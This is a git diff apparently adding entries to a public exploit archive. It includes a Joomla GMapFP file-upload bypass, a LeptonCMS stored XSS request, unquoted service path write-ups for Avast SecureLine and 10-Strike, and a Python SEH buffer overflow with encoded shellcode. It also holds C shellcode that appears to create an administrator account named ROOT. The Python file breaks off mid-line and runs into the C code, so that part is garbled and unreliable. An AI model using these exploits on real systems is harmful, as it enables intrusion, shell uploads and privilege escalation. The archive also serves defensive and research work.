diff --git a/exploits/php/webapps/48245.txt b/exploits/php/webapps/48245.txt
index 2622b9f68..fb35347b7 100644
--- a/exploits/php/webapps/48245.txt
+++ b/exploits/php/webapps/48245.txt
@@ -1,4 +1,4 @@
-# Exploit Title: Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting
+# Exploit Title: Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting
# Date: 2020-02-18
# Vendor Homepage: https://wpforms.com
# Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/#developers
diff --git a/exploits/php/webapps/48248.txt b/exploits/php/webapps/48248.txt
new file mode 100644
index 000000000..6b8186610
--- /dev/null
+++ b/exploits/php/webapps/48248.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload
+# Google Dork: inurl:''com_gmapfp''
+# Date: 2020-03-25
+# Exploit Author: ThelastVvV
+# Vendor Homepage:https://gmapfp.org/
+# Version:* Version J3.30pro
+# Tested on: Ubuntu
+
+# PoC:
+
+http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image
+
+# you can bypass the the restriction by uploading your file.php.png , file2.php.jpeg , file3.html.jpg ,file3.txt.jpg
+
+# Dir File Path:
+
+http://127.0.0.1/images/gmapfp/file.php
+
+or
+
+http://127.0.0.1//images/gmapfp/file.php.png
+
+# The Joomla Gmapfp Components 3.x is allowing
+# remote attackers to upload arbitrary files upload/shell upload due the issues of unrestricted file uploads
\ No newline at end of file
diff --git a/exploits/php/webapps/48250.txt b/exploits/php/webapps/48250.txt
new file mode 100644
index 000000000..01f7d3944
--- /dev/null
+++ b/exploits/php/webapps/48250.txt
@@ -0,0 +1,43 @@
+# Exploit Title: LeptonCMS 4.5.0 - Persistent Cross-Site Scripting
+# Google Dork: "lepton cms"
+# Date: 2019-03-24
+# Exploit Author: SunCSR (Sun* Cyber Security Research)
+# Vendor Homepage: https://lepton-cms.org/english/home.php
+# Software Link:
+https://lepton-cms.org/posts/new-release-lepton-4.5.0-139.php
+# Version: 4.5.0
+# Tested on: Windows
+# CVE : N/A
+
+### Vulnerability : Persistent Cross-Site Scripting
+
+# Description
+A stored cross-site-scripting security issue in the edit page feature
+Url : http://TARGET/lepton/backend/pages/modify.php
+Request Type: POST
+Vulnerable Parameter : "content"
+Payload : content=
+
+#POC
+POST /lepton/modules/wysiwyg/save.php?leptoken=03d01fea73f9810402beez1585032684 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 79
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/lepton/backend/pages/modify.php?page_id=5&leptoken=f04ef2dc728873e9fa849z1585032680
+Cookie: cookieconsent_status=dismiss; SESSc3618c3927e551a1d6443b365aef1bc3=_guGZcGkV8IUWJx91f8pVQo8aBpxO4ipp75Un8WQN-g; _ctr=MTI3XzBfMF8xLlpa; nv4_cltz=420.420.420%257C%252F%257C.thiennv.com; nv4_ctr=MTI3XzBfMF8xLlpa; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off; 5e71dbd610916_SESSION=bt38jrlr7ajgc28t6db10mdgu7; lep8407sessionid=6aqrn6ccetoeqdes68e44hdlul
+Upgrade-Insecure-Requests: 1
+
+page_id=5§ion_id=5&content5=
+
+### History
+=============
+2020-03-18 Issue discovered
+2020-04-20 Vendor contacted
+2020-04-21 Vendor response and hotfix
+2020-04-23 Vendor releases fixed versions
\ No newline at end of file
diff --git a/exploits/windows/local/48249.txt b/exploits/windows/local/48249.txt
new file mode 100644
index 000000000..0b99cb7aa
--- /dev/null
+++ b/exploits/windows/local/48249.txt
@@ -0,0 +1,37 @@
+# Exploit Title: AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-03-24
+# Vendor Homepage:https://www.avast.com/
+# Software Link :https://www.avast.com/es-mx/download-thank-you.php?product=SLN&locale=es-mx
+# Tested Version: 5.5.522.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 8.1 Single Language x32 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | f
+indstr /i /v "C:\Windows\\" | findstr /i "Avast SecureLine" | findstr /i /v """
+Avast SecureLine
+ SecureLine C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe
+ Auto
+
+C:\>sc qc SecureLine
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SecureLine
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Avast SecureLine
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+# Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path
+# undetected by the OS or other security applications where it could potentially be executed during
+# application startup or reboot. If successful, the local user's code would execute with the elevated
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48251.txt b/exploits/windows/local/48251.txt
new file mode 100644
index 000000000..1e7db5c21
--- /dev/null
+++ b/exploits/windows/local/48251.txt
@@ -0,0 +1,37 @@
+# Exploit Title: 10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path
+# Date: 2020-03-24
+# Author: Felipe Winsnes
+# Vendor Homepage: https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Version: 8.54
+# Tested on: Windows 7
+
+# Step to discover Unquoted Service Path:
+
+C:\Users\IEUser>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+srvInventoryWebServer srvInventoryWebServer C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe Auto
+
+# Service info:
+
+C:\>sc qc srvInventoryWebServer
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: srvInventoryWebServer
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : srvInventoryWebServer
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\>
+
+# Exploit:
+
+# A successful attempt would require the local user to be able to insert their code in the
+# system root path undetected by the OS or other security applications where it could
+# potentially be executed during application startup or reboot. If successful, the local
+# user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48253.py b/exploits/windows/local/48253.py
new file mode 100755
index 000000000..ba2e52d64
--- /dev/null
+++ b/exploits/windows/local/48253.py
@@ -0,0 +1,69 @@
+# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)
+# Date: 2020-03-24
+# Author: Felipe Winsnes
+# Vendor Homepage: https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Version: 8.54
+# Tested on: Windows 7
+
+# Proof of Concept:
+# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
+# 2.- Copy the content of the new file 'poc.txt' to clipboard
+# 3.- Open the Application
+# 4.- Go to 'Main' or 'Computers'
+# 5.- Click upon 'Add'
+# 6.- Paste clipboard on 'Computer' parameter, under the title "Computer Card"
+# 7.- Click "OK"
+# 8.- Profit
+
+# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Strike-Network-Inventory-Explorer-Structered-Exception-Handling-Overwrite/
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed
+# Payload size: 448 bytes
+
+buf = b""
+buf += b"\x89\xe2\xda\xc3\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x78\x68\x4f"
+buf += b"\x72\x47\x70\x63\x30\x57\x70\x63\x50\x4d\x59\x4b\x55"
+buf += b"\x55\x61\x49\x50\x45\x34\x6c\x4b\x50\x50\x36\x50\x4c"
+buf += b"\x4b\x53\x62\x56\x6c\x4e\x6b\x33\x62\x44\x54\x4e\x6b"
+buf += b"\x42\x52\x54\x68\x74\x4f\x68\x37\x50\x4a\x56\x46\x44"
+buf += b"\x71\x49\x6f\x6e\x4c\x45\x6c\x63\x51\x53\x4c\x53\x32"
+buf += b"\x76\x4c\x61\x30\x5a\x61\x58\x4f\x74\x4d\x76\x61\x49"
+buf += b"\x57\x59\x72\x5a\x52\x46\x32\x56\x37\x6c\x4b\x30\x52"
+buf += b"\x36\x70\x6c\x4b\x73\x7a\x57\x4c\x4c\x4b\x30\x4c\x64"
+buf += b"\x51\x70\x78\x7a\x43\x33\x78\x75\x51\x68\x51\x70\x51"
+buf += b"\x4c\x4b\x76\x39\x55\x70\x67\x71\x38\x53\x4e\x6b\x31"
+buf += b"\x59\x66\x78\x38\x63\x45\x6a\x51\x59\x6c\x4b\x70\x34"
+buf += b"\x4c\x4b\x57\x71\x59\x46\x45\x61\x59\x6f\x6e\x4c\x4b"
+buf += b"\x71\x58\x4f\x66\x6d\x76\x61\x5a\x67\x56\x58\x6b\x50"
+buf += b"\x73\x45\x49\x66\x75\x53\x71\x6d\x4c\x38\x37\x4b\x43"
+buf += b"\x4d\x67\x54\x63\x45\x4b\x54\x52\x78\x6c\x4b\x73\x68"
+buf += b"\x37\x54\x56\x61\x69\x43\x73\x56\x4c\x4b\x76\x6c\x32"
+buf += b"\x6b\x6e\x6b\x61\x48\x65\x4c\x55\x51\x7a\x73\x6c\x4b"
+buf += b"\x54\x44\x4e\x6b\x43\x31\x6a\x70\x4b\x39\x32\x64\x35"
+buf += b"\x74\x55\x74\x63\x6b\x43\x6b\x75\x31\x72\x79\x73\x6a"
+buf += b"\x56\x31\x59\x6f\x4b\x50\x53\x6f\x51\x4f\x43\x6a\x4c"
+buf += b"\x4b\x62\x32\x6a\x4b\x4c\x4d\x43\x6d\x63\x5a\x76\x61"
+buf += b"\x6e\x6d\x6d\x55\x4e\x52\x53\x30\x77\x70\x55\x50\x76"
+buf += b"\x30\x32\x48\x70\x31\x6c\x4b\x50\x6f\x6f\x77\x69\x6f"
+buf += b"\x58\x55\x4d\x6b\x4a\x50\x58\x35\x4e\x42\x42\x76\x75"
+buf += b"\x38\x6f\x56\x6f\x65\x4d\x6d\x6d\x4d\x59\x6f\x39\x45"
+buf += b"\x77\x4c\x76\x66\x73\x4c\x76\x6a\x4d\x50\x79\x6b\x4d"
+buf += b"\x30\x70\x75\x37\x75\x6f\x4b\x53\x77\x67\x63\x73\x42"
+buf += b"\x72\x4f\x50\x6a\x55\x50\x56\x33\x39\x6f\x39\x45\x45"
+buf += b"\x33\x30\x61\x50\x6c\x70\x63\x34\x6e\x42\x45\x51\x68"
+buf += b"\x31\x75\x65\x50\x41\x41"
+
+nseh = struct.pack("
+#include
+
+char code[] = \
+"\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x1c"
+"\xad\x96\xad\x8b\x40\x08\x50\x8b\x58\x3c\x01\xc3"
+"\x8b\x5b\x78\x01\xc3\x8b\x53\x20\x01\xc2\x8b\x4b"
+"\x24\x01\xc1\x51\x8b\x7b\x1c\x01\xc7\x57\x68\x57"
+"\x69\x6e\x45\x31\xc0\x89\xd7\x89\xe6\x31\xc9\xfc"
+"\x8b\x3c\x87\x03\x7c\x24\x0c\x66\x83\xc1\x04\xf3"
+"\xa6\x74\x03\x40\xeb\xe7\x8b\x4c\x24\x08\x66\x8b"
+"\x04\x41\x8b\x54\x24\x04\x8b\x1c\x82\x03\x5c\x24"
+"\x0c\x31\xc9\xf7\xe1\xb0\x44\x50\x68\x20\x2f\x41"
+"\x44\x68\x52\x4f\x4f\x54\x68\x6f\x72\x73\x20\x68"
+"\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x41"
+"\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67"
+"\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
+"\x44\x20\x26\x68\x24\x20\x2f\x41\x68\x52\x30\x30"
+"\x54\x68\x20\x49\x40\x6d\x68\x52\x4f\x4f\x54\x68"
+"\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63"
+"\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e"
+"\x89\xe0\x51\x50\xff\xd3";
+
+int main(int argc, char **argv)
+{
+ int (*func)();
+ func = (int(*)()) code;
+ (int)(*func)();
+}
\ No newline at end of file